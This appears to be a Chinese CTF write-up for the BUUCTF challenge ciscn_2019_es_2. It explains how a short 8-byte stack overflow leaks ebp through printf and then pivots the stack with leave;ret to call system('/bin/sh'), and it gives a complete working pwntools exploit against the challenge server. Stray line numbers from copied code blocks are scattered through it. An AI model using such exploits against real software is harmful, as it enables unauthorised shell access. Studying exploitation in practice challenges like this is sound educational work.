ciscn_2019_es_2【BUUCTF】

开启NX，32位，动态编译，IDA查看


我们可以看到read()函数存在溢出漏洞，但与往常溢出不同的是，该溢出仅仅只能溢出8(0x30-0x28)字节的数据，恰好就是覆盖ebp和ret地址数据，并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中，并返回让其执行该函数即可。
这里有两个问题，1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数

第一个问题：system(“/bin/sh”)存储地址如何得知

read()函数将我们输入内容读到char s[40]中，这是一个局部变量，我们无法直接知道其地址，但我们知道s地址与函数基地址ebp的偏移量是一定的，不会变化，因此只要知道了ebp地址就能知道s的地址，也同时可以通过计算知道我们输入的内容的具体位置！！！

如何知道ebp地址

在read后会执行printf函数，printf函数会将00作为截断符号，但若我们将ebp之前的内容全部填满，不让其出现阶段符号，那么printf就可以输出ebp地址了！！栈空间如图：

# 第一阶段
payload = b'a'*0x24 + b'BBBB'
io.recvuntil("name?")
io.send(payload) # 不要用sendline，sendline会自己加一个\n符号，导致send了29个字节
io.recvuntil("BBBB")
ebp_addr = u32(io.recv(4))
debug.info("epb_addr: "+ hex(ebp_addr))
1
2
3
4
5
6
7

如何通过ebp计算输入内容地址

gdb调试，发现ebp地址为0xffffcfd8，而输入的"AAAAAAAA"在0xffffcfa4，相差0x34，则ebp - 0x34 + offset 就可计算read读入的任何字符地址

如何返回该system地址执行函数

要知道如何返回system地址执行函数，首先要知道一个函数的执行过程，并且知道该函数的栈空间地址和参数地址

函数执行过程

该题有个hack函数，比较简单，可以使用hack函数对函数执行过程进行分析

二进制：

主要是push ebp这条，返回一个函数时，会先将返回地址压入ebp指针。并且在函数执行完毕时存在leave retn函数
因此我们需要先找到leave retn返回到system函数地址-4处，因此返回后会先将4自己压入ebp，若返回system函数地址则会将system函数地址压入ebp。这里不要和之前直接返回到一个函数混淆，之前是直接将ebp覆盖了，将ret地址修改为一个函数的地址，直接执行该函数，但我们栈溢出字节过少，这种方式不合适，因此这里是修改ebp，返回到ebp所指向的地址。构造的栈空间如图：

# 第二阶段
leave_ret_addr= 0x080485FD
system_addr = elf.symbols["system"]
payload = b'A'*4 + p32(system_addr) + p32(0) + p32(ebp_addr-0x38+0x10) + b"/bin/sh"
payload=payload.ljust(0x28,b'\x00') + p32(ebp_addr-0x38) + p32(leave_ret_addr)
1
2
3
4
5

完整代码

from pwn import *
context.log_level = True
io=remote("node4.buuoj.cn", 25309)
elf = ELF("./ciscn_2019_es_2")
# 第一阶段
payload = b'a'*0x24 + b'BBBB'
io.recvuntil("name?")
io.send(payload) # 不要用sendline，sendline会自己加一个\n符号，导致send了29个字节
io.recvuntil("BBBB")
ebp_addr = u32(io.recv(4))
log.info("epb_addr: "+ hex(ebp_addr))
# 第二阶段
leave_ret_addr= 0x080485FD
system_addr = elf.symbols["system"]
payload = b'A'*4 + p32(system_addr) + p32(0) + p32(ebp_addr-0x38+0x10) + b"/bin/sh"
payload=payload.ljust(0x28,b'\x00') + p32(ebp_addr-0x38) + p32(leave_ret_addr)
io.send(payload)
io.interactive()


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20